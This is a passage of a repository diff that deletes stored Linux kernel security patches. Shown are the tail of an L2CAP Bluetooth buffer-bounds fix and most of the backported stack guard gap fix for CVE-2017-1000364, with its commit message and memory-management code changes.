- static int l2cap_parse_conf_rsp(struct l2cap_chan *chan, void *rsp, int len,
--				void *data, u16 *result)
-+				void *data, size_t size, u16 *result)
- {
- 	struct l2cap_conf_req *req = data;
- 	void *ptr = req->data;
-+	void *endptr = data + size;
- 	int type, olen;
- 	unsigned long val;
- 	struct l2cap_conf_rfc rfc = { .mode = L2CAP_MODE_BASIC };
-@@ -3548,13 +3554,13 @@ static int l2cap_parse_conf_rsp(struct l2cap_chan *chan, void *rsp, int len,
- 				chan->imtu = L2CAP_DEFAULT_MIN_MTU;
- 			} else
- 				chan->imtu = val;
--			l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->imtu);
-+			l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->imtu, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_FLUSH_TO:
- 			chan->flush_to = val;
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FLUSH_TO,
--					   2, chan->flush_to);
-+					   2, chan->flush_to, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_RFC:
-@@ -3568,13 +3574,13 @@ static int l2cap_parse_conf_rsp(struct l2cap_chan *chan, void *rsp, int len,
- 			chan->fcs = 0;
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					   sizeof(rfc), (unsigned long) &rfc);
-+					   sizeof(rfc), (unsigned long) &rfc, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_EWS:
- 			chan->ack_win = min_t(u16, val, chan->ack_win);
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EWS, 2,
--					   chan->tx_win);
-+					   chan->tx_win, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_EFS:
-@@ -3587,7 +3593,7 @@ static int l2cap_parse_conf_rsp(struct l2cap_chan *chan, void *rsp, int len,
- 				return -ECONNREFUSED;
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EFS, sizeof(efs),
--					   (unsigned long) &efs);
-+					   (unsigned long) &efs, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_FCS:
-@@ -3692,7 +3698,7 @@ void __l2cap_connect_rsp_defer(struct l2cap_chan *chan)
- 		return;
- 
- 	l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--		       l2cap_build_conf_req(chan, buf), buf);
-+		       l2cap_build_conf_req(chan, buf, sizeof(buf)), buf);
- 	chan->num_conf_req++;
- }
- 
-@@ -3900,7 +3906,7 @@ sendresp:
- 		u8 buf[128];
- 		set_bit(CONF_REQ_SENT, &chan->conf_state);
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--			       l2cap_build_conf_req(chan, buf), buf);
-+			       l2cap_build_conf_req(chan, buf, sizeof(buf)), buf);
- 		chan->num_conf_req++;
- 	}
- 
-@@ -3978,7 +3984,7 @@ static int l2cap_connect_create_rsp(struct l2cap_conn *conn,
- 			break;
- 
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--			       l2cap_build_conf_req(chan, req), req);
-+			       l2cap_build_conf_req(chan, req, sizeof(req)), req);
- 		chan->num_conf_req++;
- 		break;
- 
-@@ -4090,7 +4096,7 @@ static inline int l2cap_config_req(struct l2cap_conn *conn,
- 	}
- 
- 	/* Complete config. */
--	len = l2cap_parse_conf_req(chan, rsp);
-+	len = l2cap_parse_conf_req(chan, rsp, sizeof(rsp));
- 	if (len < 0) {
- 		l2cap_send_disconn_req(chan, ECONNRESET);
- 		goto unlock;
-@@ -4124,7 +4130,7 @@ static inline int l2cap_config_req(struct l2cap_conn *conn,
- 	if (!test_and_set_bit(CONF_REQ_SENT, &chan->conf_state)) {
- 		u8 buf[64];
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--			       l2cap_build_conf_req(chan, buf), buf);
-+			       l2cap_build_conf_req(chan, buf, sizeof(buf)), buf);
- 		chan->num_conf_req++;
- 	}
- 
-@@ -4184,7 +4190,7 @@ static inline int l2cap_config_rsp(struct l2cap_conn *conn,
- 			char buf[64];
- 
- 			len = l2cap_parse_conf_rsp(chan, rsp->data, len,
--						   buf, &result);
-+						   buf, sizeof(buf), &result);
- 			if (len < 0) {
- 				l2cap_send_disconn_req(chan, ECONNRESET);
- 				goto done;
-@@ -4214,7 +4220,7 @@ static inline int l2cap_config_rsp(struct l2cap_conn *conn,
- 			/* throw out any old stored conf requests */
- 			result = L2CAP_CONF_SUCCESS;
- 			len = l2cap_parse_conf_rsp(chan, rsp->data, len,
--						   req, &result);
-+						   req, sizeof(req), &result);
- 			if (len < 0) {
- 				l2cap_send_disconn_req(chan, ECONNRESET);
- 				goto done;
-@@ -4791,7 +4797,7 @@ static void l2cap_do_create(struct l2cap_chan *chan, int result,
- 			set_bit(CONF_REQ_SENT, &chan->conf_state);
- 			l2cap_send_cmd(chan->conn, l2cap_get_ident(chan->conn),
- 				       L2CAP_CONF_REQ,
--				       l2cap_build_conf_req(chan, buf), buf);
-+				       l2cap_build_conf_req(chan, buf, sizeof(buf)), buf);
- 			chan->num_conf_req++;
- 		}
- 	}
-@@ -7465,7 +7471,7 @@ static void l2cap_security_cfm(struct hci_conn *hcon, u8 status, u8 encrypt)
- 				set_bit(CONF_REQ_SENT, &chan->conf_state);
- 				l2cap_send_cmd(conn, l2cap_get_ident(conn),
- 					       L2CAP_CONF_REQ,
--					       l2cap_build_conf_req(chan, buf),
-+					       l2cap_build_conf_req(chan, buf, sizeof(buf)),
- 					       buf);
- 				chan->num_conf_req++;
- 			}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0005.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0005.patch
deleted file mode 100644
index 164af9bd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0005.patch
+++ /dev/null
@@ -1,860 +0,0 @@
-From 9954e33ef0e1f5e1136c1bdde1e18f40e9c8af69 Mon Sep 17 00:00:00 2001
-From: Hugh Dickins <hughd@google.com>
-Date: Mon, 19 Jun 2017 04:03:24 -0700
-Subject: [PATCH] mm: larger stack guard gap, between vmas
-
-commit 1be7107fbe18eed3e319a6c3e83c78254b693acb upstream.
-
-Stack guard page is a useful feature to reduce a risk of stack smashing
-into a different mapping. We have been using a single page gap which
-is sufficient to prevent having stack adjacent to a different mapping.
-But this seems to be insufficient in the light of the stack usage in
-userspace. E.g. glibc uses as large as 64kB alloca() in many commonly
-used functions. Others use constructs liks gid_t buffer[NGROUPS_MAX]
-which is 256kB or stack strings with MAX_ARG_STRLEN.
-
-This will become especially dangerous for suid binaries and the default
-no limit for the stack size limit because those applications can be
-tricked to consume a large portion of the stack and a single glibc call
-could jump over the guard page. These attacks are not theoretical,
-unfortunatelly.
-
-Make those attacks less probable by increasing the stack guard gap
-to 1MB (on systems with 4k pages; but make it depend on the page size
-because systems with larger base pages might cap stack allocations in
-the PAGE_SIZE units) which should cover larger alloca() and VLA stack
-allocations. It is obviously not a full fix because the problem is
-somehow inherent, but it should reduce attack space a lot.
-
-One could argue that the gap size should be configurable from userspace,
-but that can be done later when somebody finds that the new 1MB is wrong
-for some special case applications.  For now, add a kernel command line
-option (stack_guard_gap) to specify the stack gap size (in page units).
-
-Implementation wise, first delete all the old code for stack guard page:
-because although we could get away with accounting one extra page in a
-stack vma, accounting a larger gap can break userspace - case in point,
-a program run with "ulimit -S -v 20000" failed when the 1MB gap was
-counted for RLIMIT_AS; similar problems could come with RLIMIT_MLOCK
-and strict non-overcommit mode.
-
-Instead of keeping gap inside the stack vma, maintain the stack guard
-gap as a gap between vmas: using vm_start_gap() in place of vm_start
-(or vm_end_gap() in place of vm_end if VM_GROWSUP) in just those few
-places which need to respect the gap - mainly arch_get_unmapped_area(),
-and and the vma tree's subtree_gap support for that.
-
-Change-Id: I899511079c5057ee5299ef1aff5ab8f0c77c740d
-Original-patch-by: Oleg Nesterov <oleg@redhat.com>
-Original-patch-by: Michal Hocko <mhocko@suse.com>
-Signed-off-by: Hugh Dickins <hughd@google.com>
-[wt: backport to 4.11: adjust context]
-[wt: backport to 4.9: adjust context ; kernel doc was not in admin-guide]
-[wt: backport to 4.4: adjust context ; drop ppc hugetlb_radix changes]
-[wt: backport to 3.18: adjust context ; no FOLL_POPULATE ;
-     s390 uses generic arch_get_unmapped_area()]
-[wt: backport to 3.16: adjust context]
-[wt: backport to 3.10: adjust context ; code logic in PARISC's
-     arch_get_unmapped_area() wasn't found ; code inserted into
-     expand_upwards() and expand_downwards() runs under anon_vma lock;
-     changes for gup.c:faultin_page go to memory.c:__get_user_pages();
-     included Hugh Dickins' fixes]
-Signed-off-by: Willy Tarreau <w@1wt.eu>
----
-
-diff --git a/Documentation/kernel-parameters.txt b/Documentation/kernel-parameters.txt
-index 2fcbee1..a91d035 100644
---- a/Documentation/kernel-parameters.txt
-+++ b/Documentation/kernel-parameters.txt
-@@ -2918,6 +2918,13 @@
- 	spia_pedr=
- 	spia_peddr=
- 
-+	stack_guard_gap=	[MM]
-+			override the default stack gap protection. The value
-+			is in page units and it defines how many pages prior
-+			to (for stacks growing down) resp. after (for stacks
-+			growing up) the main stack are reserved for no other
-+			mapping. Default value is 256 pages.
-+
- 	stacktrace	[FTRACE]
- 			Enabled the stack tracer on boot up.
- 
-diff --git a/arch/arc/mm/mmap.c b/arch/arc/mm/mmap.c
-index 2e06d56..cf4ae69 100644
---- a/arch/arc/mm/mmap.c
-+++ b/arch/arc/mm/mmap.c
-@@ -64,7 +64,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/arm/mm/mmap.c b/arch/arm/mm/mmap.c
-index 2d689d1..dae47df 100644
---- a/arch/arm/mm/mmap.c
-+++ b/arch/arm/mm/mmap.c
-@@ -89,7 +89,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -140,7 +140,7 @@
- 			addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/frv/mm/elf-fdpic.c b/arch/frv/mm/elf-fdpic.c
-index 836f147..efa59f1 100644
---- a/arch/frv/mm/elf-fdpic.c
-+++ b/arch/frv/mm/elf-fdpic.c
-@@ -74,7 +74,7 @@
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(current->mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			goto success;
- 	}
- 
-diff --git a/arch/mips/mm/mmap.c b/arch/mips/mm/mmap.c
-index 5ab9e96..7f46346 100644
---- a/arch/mips/mm/mmap.c
-+++ b/arch/mips/mm/mmap.c
-@@ -92,7 +92,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/powerpc/mm/slice.c b/arch/powerpc/mm/slice.c
-index 7ce9cf3..887365a 100644
---- a/arch/powerpc/mm/slice.c
-+++ b/arch/powerpc/mm/slice.c
-@@ -103,7 +103,7 @@
- 	if ((mm->task_size - len) < addr)
- 		return 0;
- 	vma = find_vma(mm, addr);
--	return (!vma || (addr + len) <= vma->vm_start);
-+	return (!vma || (addr + len) <= vm_start_gap(vma));
- }
- 
- static int slice_low_has_vma(struct mm_struct *mm, unsigned long slice)
-diff --git a/arch/sh/mm/mmap.c b/arch/sh/mm/mmap.c
-index 6777177..7df7d59 100644
---- a/arch/sh/mm/mmap.c
-+++ b/arch/sh/mm/mmap.c
-@@ -63,7 +63,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -113,7 +113,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/sparc/kernel/sys_sparc_64.c b/arch/sparc/kernel/sys_sparc_64.c
-index 21bca21..ea80c0b 100644
---- a/arch/sparc/kernel/sys_sparc_64.c
-+++ b/arch/sparc/kernel/sys_sparc_64.c
-@@ -119,7 +119,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -182,7 +182,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/sparc/mm/hugetlbpage.c b/arch/sparc/mm/hugetlbpage.c
-index 9639964..64ee888 100644
---- a/arch/sparc/mm/hugetlbpage.c
-+++ b/arch/sparc/mm/hugetlbpage.c
-@@ -118,7 +118,7 @@
- 		addr = ALIGN(addr, HPAGE_SIZE);
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/tile/mm/hugetlbpage.c b/arch/tile/mm/hugetlbpage.c
-index 0ac3599..d435215 100644
---- a/arch/tile/mm/hugetlbpage.c
-+++ b/arch/tile/mm/hugetlbpage.c
-@@ -302,7 +302,7 @@
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (current->mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/x86/kernel/sys_x86_64.c b/arch/x86/kernel/sys_x86_64.c
-index 30277e2..d050393 100644
---- a/arch/x86/kernel/sys_x86_64.c
-+++ b/arch/x86/kernel/sys_x86_64.c
-@@ -127,7 +127,7 @@
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (end - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -166,7 +166,7 @@
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/x86/mm/hugetlbpage.c b/arch/x86/mm/hugetlbpage.c
-index 4348803..1bb5570 100644
---- a/arch/x86/mm/hugetlbpage.c
-+++ b/arch/x86/mm/hugetlbpage.c
-@@ -349,7 +349,7 @@
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/xtensa/kernel/syscall.c b/arch/xtensa/kernel/syscall.c
-index 5d3f7a1..1ff0b92 100644
---- a/arch/xtensa/kernel/syscall.c
-+++ b/arch/xtensa/kernel/syscall.c
-@@ -86,7 +86,7 @@
- 		/* At this point:  (!vmm || addr < vmm->vm_end). */
- 		if (TASK_SIZE - len < addr)
- 			return -ENOMEM;
--		if (!vmm || addr + len <= vmm->vm_start)
-+		if (!vmm || addr + len <= vm_start_gap(vmm))
- 			return addr;
- 		addr = vmm->vm_end;
- 		if (flags & MAP_SHARED)
-diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
-index 4e5f332..db7d89c 100644
---- a/fs/hugetlbfs/inode.c
-+++ b/fs/hugetlbfs/inode.c
-@@ -169,7 +169,7 @@
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
-index f7cf04b..ced4a0b 100644
---- a/fs/proc/task_mmu.c
-+++ b/fs/proc/task_mmu.c
-@@ -322,11 +322,7 @@
- 
- 	/* We don't show the stack guard page in /proc/maps */
- 	start = vma->vm_start;
--	if (stack_guard_page_start(vma, start))
--		start += PAGE_SIZE;
- 	end = vma->vm_end;
--	if (stack_guard_page_end(vma, end))
--		end -= PAGE_SIZE;
- 
- 	seq_setwidth(m, 25 + sizeof(void *) * 6 - 1);
- 	seq_printf(m, "%08lx-%08lx %c%c%c%c %08llx %02x:%02x %lu ",
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index 6713bcd..1ed4b4b 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -1098,34 +1098,6 @@
- int clear_page_dirty_for_io(struct page *page);
- int get_cmdline(struct task_struct *task, char *buffer, int buflen);
- 
--/* Is the vma a continuation of the stack vma above it? */
--static inline int vma_growsdown(struct vm_area_struct *vma, unsigned long addr)
--{
--	return vma && (vma->vm_end == addr) && (vma->vm_flags & VM_GROWSDOWN);
--}
--
--static inline int stack_guard_page_start(struct vm_area_struct *vma,
--					     unsigned long addr)
--{
--	return (vma->vm_flags & VM_GROWSDOWN) &&
--		(vma->vm_start == addr) &&
--		!vma_growsdown(vma->vm_prev, addr);
--}
--
--/* Is the vma a continuation of the stack vma below it? */
--static inline int vma_growsup(struct vm_area_struct *vma, unsigned long addr)
--{
--	return vma && (vma->vm_start == addr) && (vma->vm_flags & VM_GROWSUP);
--}
--
--static inline int stack_guard_page_end(struct vm_area_struct *vma,
--					   unsigned long addr)
--{
--	return (vma->vm_flags & VM_GROWSUP) &&
--		(vma->vm_end == addr) &&
--		!vma_growsup(vma->vm_next, addr);
--}
--
- extern pid_t
- vm_is_stack(struct task_struct *task, struct vm_area_struct *vma, int in_group);
- 
-@@ -1677,6 +1649,7 @@
- 			struct address_space *mapping,
- 			struct file *filp);
- 
-+extern unsigned long stack_guard_gap;
- /* Generic expand stack which grows the stack according to GROWS{UP,DOWN} */
- extern int expand_stack(struct vm_area_struct *vma, unsigned long address);
- 
-@@ -1705,6 +1678,30 @@
- 	return vma;
- }
- 
-+static inline unsigned long vm_start_gap(struct vm_area_struct *vma)
-+{
-+	unsigned long vm_start = vma->vm_start;
-+
-+	if (vma->vm_flags & VM_GROWSDOWN) {
-+		vm_start -= stack_guard_gap;
-+		if (vm_start > vma->vm_start)
-+			vm_start = 0;
-+	}
-+	return vm_start;
-+}
-+
-+static inline unsigned long vm_end_gap(struct vm_area_struct *vma)
-+{
-+	unsigned long vm_end = vma->vm_end;
-+
-+	if (vma->vm_flags & VM_GROWSUP) {
-+		vm_end += stack_guard_gap;
-+		if (vm_end < vma->vm_end)
-+			vm_end = -PAGE_SIZE;
-+	}
-+	return vm_end;
-+}
-+
- static inline unsigned long vma_pages(struct vm_area_struct *vma)
- {
- 	return (vma->vm_end - vma->vm_start) >> PAGE_SHIFT;
-diff --git a/mm/memory.c b/mm/memory.c
-index 0c03425..ed90be3 100644
---- a/mm/memory.c
-+++ b/mm/memory.c
-@@ -1478,8 +1478,6 @@
- 	return alloc_page(GFP_HIGHUSER);
- }
- 
--static inline int stack_guard_page(struct vm_area_struct *vma, unsigned long addr);
--
- static bool __need_migrate_cma_page(struct page *page,
- 				struct vm_area_struct *vma,
- 				unsigned long start, unsigned int flags)
-@@ -1791,12 +1789,6 @@
- 	return page;
- }
- 
--static inline int stack_guard_page(struct vm_area_struct *vma, unsigned long addr)
--{
--	return stack_guard_page_start(vma, addr) ||
--	       stack_guard_page_end(vma, addr+PAGE_SIZE);
--}
--
- /**
-  * __get_user_pages() - pin user pages in memory
-  * @tsk:	task_struct of target task
-@@ -1977,11 +1969,6 @@
- 				int ret;
- 				unsigned int fault_flags = 0;
- 
--				/* For mlock, just skip the stack guard page. */
--				if (foll_flags & FOLL_MLOCK) {
--					if (stack_guard_page(vma, start))
--						goto next_page;
--				}
- 				if (foll_flags & FOLL_WRITE)
- 					fault_flags |= FAULT_FLAG_WRITE;
- 				if (nonblocking)
-@@ -3353,40 +3340,6 @@
- }
- 
- /*
-- * This is like a special single-page "expand_{down|up}wards()",
-- * except we must first make sure that 'address{-|+}PAGE_SIZE'
-- * doesn't hit another vma.
-- */
--static inline int check_stack_guard_page(struct vm_area_struct *vma, unsigned long address)
--{
--	address &= PAGE_MASK;
--	if ((vma->vm_flags & VM_GROWSDOWN) && address == vma->vm_start) {
--		struct vm_area_struct *prev = vma->vm_prev;
--
--		/*
--		 * Is there a mapping abutting this one below?
--		 *
--		 * That's only ok if it's the same stack mapping
--		 * that has gotten split..
--		 */
--		if (prev && prev->vm_end == address)
--			return prev->vm_flags & VM_GROWSDOWN ? 0 : -ENOMEM;
--
--		return expand_downwards(vma, address - PAGE_SIZE);
--	}
--	if ((vma->vm_flags & VM_GROWSUP) && address + PAGE_SIZE == vma->vm_end) {
--		struct vm_area_struct *next = vma->vm_next;
--
--		/* As VM_GROWSDOWN but s/below/above/ */
--		if (next && next->vm_start == address + PAGE_SIZE)
--			return next->vm_flags & VM_GROWSUP ? 0 : -ENOMEM;
--
--		return expand_upwards(vma, address + PAGE_SIZE);
--	}
--	return 0;
--}
--
--/*
-  * We enter with non-exclusive mmap_sem (to exclude vma changes,
-  * but allow concurrent faults), and pte mapped but not yet locked.
-  * We return with mmap_sem still held, but pte unmapped and unlocked.
-@@ -3404,10 +3357,6 @@
- 	/* File mapping without ->vm_ops ? */
- 	if (vma->vm_flags & VM_SHARED)
- 		return VM_FAULT_SIGBUS;
--
--	/* Check if we need to add a guard page to the stack */
--	if (check_stack_guard_page(vma, address) < 0)
--		return VM_FAULT_SIGSEGV;
- 
- 	/* Use the zero-page for reads */
- 	if (!(flags & FAULT_FLAG_WRITE)) {
-diff --git a/mm/mmap.c b/mm/mmap.c
-index 4767b9d..70cf32e 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -275,6 +275,7 @@
- 	unsigned long rlim, retval;
- 	unsigned long newbrk, oldbrk;
- 	struct mm_struct *mm = current->mm;
-+	struct vm_area_struct *next;
- 	unsigned long min_brk;
- 	bool populate;
- 
-@@ -320,7 +321,8 @@
- 	}
- 
- 	/* Check against existing mmap mappings. */
--	if (find_vma_intersection(mm, oldbrk, newbrk+PAGE_SIZE))
-+	next = find_vma(mm, oldbrk);
-+	if (next && newbrk + PAGE_SIZE > vm_start_gap(next))
- 		goto out;
- 
- 	/* Ok, looks good - let it rip. */
-@@ -343,10 +345,22 @@
- 
- static long vma_compute_subtree_gap(struct vm_area_struct *vma)
- {
--	unsigned long max, subtree_gap;
--	max = vma->vm_start;
--	if (vma->vm_prev)
--		max -= vma->vm_prev->vm_end;
-+	unsigned long max, prev_end, subtree_gap;
-+
-+	/*
-+	 * Note: in the rare case of a VM_GROWSDOWN above a VM_GROWSUP, we
-+	 * allow two stack_guard_gaps between them here, and when choosing
-+	 * an unmapped area; whereas when expanding we only require one.
-+	 * That's a little inconsistent, but keeps the code here simpler.
-+	 */
-+	max = vm_start_gap(vma);
-+	if (vma->vm_prev) {
-+		prev_end = vm_end_gap(vma->vm_prev);
-+		if (max > prev_end)
-+			max -= prev_end;
-+		else
-+			max = 0;
-+	}
- 	if (vma->vm_rb.rb_left) {
- 		subtree_gap = rb_entry(vma->vm_rb.rb_left,
- 				struct vm_area_struct, vm_rb)->rb_subtree_gap;
-@@ -430,7 +444,7 @@
- 		list_for_each_entry(avc, &vma->anon_vma_chain, same_vma)
- 			anon_vma_interval_tree_verify(avc);
- 		vma_unlock_anon_vma(vma);
--		highest_address = vma->vm_end;
-+		highest_address = vm_end_gap(vma);
- 		vma = vma->vm_next;
- 		i++;
- 	}
-@@ -598,7 +612,7 @@
- 	if (vma->vm_next)
- 		vma_gap_update(vma->vm_next);
- 	else
--		mm->highest_vm_end = vma->vm_end;
-+		mm->highest_vm_end = vm_end_gap(vma);
- 
- 	/*
- 	 * vma->vm_prev wasn't known when we followed the rbtree to find the
-@@ -847,7 +861,7 @@
- 			vma_gap_update(vma);
- 		if (end_changed) {
- 			if (!next)
--				mm->highest_vm_end = end;
-+				mm->highest_vm_end = vm_end_gap(vma);
- 			else if (!adjust_next)
- 				vma_gap_update(next);
- 		}
-@@ -890,7 +904,7 @@
- 		else if (next)
- 			vma_gap_update(next);
- 		else
--			mm->highest_vm_end = end;
-+			WARN_ON(mm->highest_vm_end != vm_end_gap(vma));
- 	}
- 	if (insert && file)
- 		uprobe_mmap(insert);
-@@ -1691,7 +1705,7 @@
- 
- 	while (true) {
- 		/* Visit left subtree if it looks promising */
--		gap_end = vma->vm_start;
-+		gap_end = vm_start_gap(vma);
- 		if (gap_end >= low_limit && vma->vm_rb.rb_left) {
- 			struct vm_area_struct *left =
- 				rb_entry(vma->vm_rb.rb_left,
-@@ -1702,7 +1716,7 @@
- 			}
- 		}
- 
--		gap_start = vma->vm_prev ? vma->vm_prev->vm_end : 0;
-+		gap_start = vma->vm_prev ? vm_end_gap(vma->vm_prev) : 0;
- check_current:
- 		/* Check if current node has a suitable gap */
- 		if (gap_start > high_limit)
-@@ -1729,8 +1743,8 @@
- 			vma = rb_entry(rb_parent(prev),
- 				       struct vm_area_struct, vm_rb);
- 			if (prev == vma->vm_rb.rb_left) {
--				gap_start = vma->vm_prev->vm_end;
--				gap_end = vma->vm_start;
-+				gap_start = vm_end_gap(vma->vm_prev);
-+				gap_end = vm_start_gap(vma);
- 				goto check_current;
- 			}
- 		}
-@@ -1794,7 +1808,7 @@
- 
- 	while (true) {
- 		/* Visit right subtree if it looks promising */
--		gap_start = vma->vm_prev ? vma->vm_prev->vm_end : 0;
-+		gap_start = vma->vm_prev ? vm_end_gap(vma->vm_prev) : 0;
- 		if (gap_start <= high_limit && vma->vm_rb.rb_right) {
- 			struct vm_area_struct *right =
- 				rb_entry(vma->vm_rb.rb_right,
-@@ -1807,7 +1821,7 @@
- 
- check_current:
- 		/* Check if current node has a suitable gap */
--		gap_end = vma->vm_start;
-+		gap_end = vm_start_gap(vma);
- 		if (gap_end < low_limit)
- 			return -ENOMEM;
- 		if (gap_start <= high_limit && gap_end - gap_start >= length)
-@@ -1833,7 +1847,7 @@
- 				       struct vm_area_struct, vm_rb);
- 			if (prev == vma->vm_rb.rb_right) {
- 				gap_start = vma->vm_prev ?
--					vma->vm_prev->vm_end : 0;
-+					vm_end_gap(vma->vm_prev) : 0;
- 				goto check_current;
- 			}
- 		}
-@@ -1871,7 +1885,7 @@
- 		unsigned long len, unsigned long pgoff, unsigned long flags)
- {
- 	struct mm_struct *mm = current->mm;
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
- 	struct vm_unmapped_area_info info;
- 
- 	if (len > TASK_SIZE - mmap_min_addr) {
-@@ -1887,9 +1901,10 @@
- 
- 	if (addr) {
- 		addr = PAGE_ALIGN(addr);
--		vma = find_vma(mm, addr);
-+		vma = find_vma_prev(mm, addr, &prev);
- 		if (TASK_SIZE - len >= addr && addr >= mmap_min_addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)) &&
-+		    (!prev || addr >= vm_end_gap(prev)))
- 			return addr;
- 	}
- 
-@@ -1920,7 +1935,7 @@
- 			  const unsigned long len, const unsigned long pgoff,
- 			  const unsigned long flags)
- {
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
- 	struct mm_struct *mm = current->mm;
- 	unsigned long addr = addr0;
- 	struct vm_unmapped_area_info info;
-@@ -1941,9 +1956,10 @@
- 	/* requesting a specific address */
- 	if (addr) {
- 		addr = PAGE_ALIGN(addr);
--		vma = find_vma(mm, addr);
-+		vma = find_vma_prev(mm, addr, &prev);
- 		if (TASK_SIZE - len >= addr && addr >= mmap_min_addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)) &&
-+				(!prev || addr >= vm_end_gap(prev)))
- 			return addr;
- 	}
- 
-@@ -2076,21 +2092,19 @@
-  * update accounting. This is shared with both the
-  * grow-up and grow-down cases.
-  */
--static int acct_stack_growth(struct vm_area_struct *vma, unsigned long size, unsigned long grow)
-+static int acct_stack_growth(struct vm_area_struct *vma,
-+			     unsigned long size, unsigned long grow)
- {
- 	struct mm_struct *mm = vma->vm_mm;
- 	struct rlimit *rlim = current->signal->rlim;
--	unsigned long new_start, actual_size;
-+	unsigned long new_start;
- 
- 	/* address space limit tests */
- 	if (!may_expand_vm(mm, grow))
- 		return -ENOMEM;
- 
- 	/* Stack limit test */
--	actual_size = size;
--	if (size && (vma->vm_flags & (VM_GROWSUP | VM_GROWSDOWN)))
--		actual_size -= PAGE_SIZE;
